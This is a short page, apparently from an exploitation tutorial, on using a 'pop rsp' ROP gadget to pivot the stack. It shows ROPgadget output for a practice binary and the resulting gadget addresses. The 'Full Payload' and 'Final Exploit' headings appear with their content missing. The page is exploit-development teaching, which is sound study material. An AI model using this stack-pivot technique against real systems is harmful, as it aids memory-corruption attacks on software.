pop rsp
Using a pop rsp gadget to stack pivot
Exploitation
Gadgets
$ ROPgadget --binary vuln | grep 'pop rsp'
0x0000000000401225 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
$ ROPgadget --binary vuln | grep 'pop rdi'
0x000000000040122b : pop rdi ; ret
$ ROPgadget --binary vuln | grep 'pop rsi'
0x0000000000401229 : pop rsi ; pop r15 ; retPOP_CHAIN = 0x401225 # RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229Testing the pop
Full Payload
Final Exploit
Last updated
Was this helpful?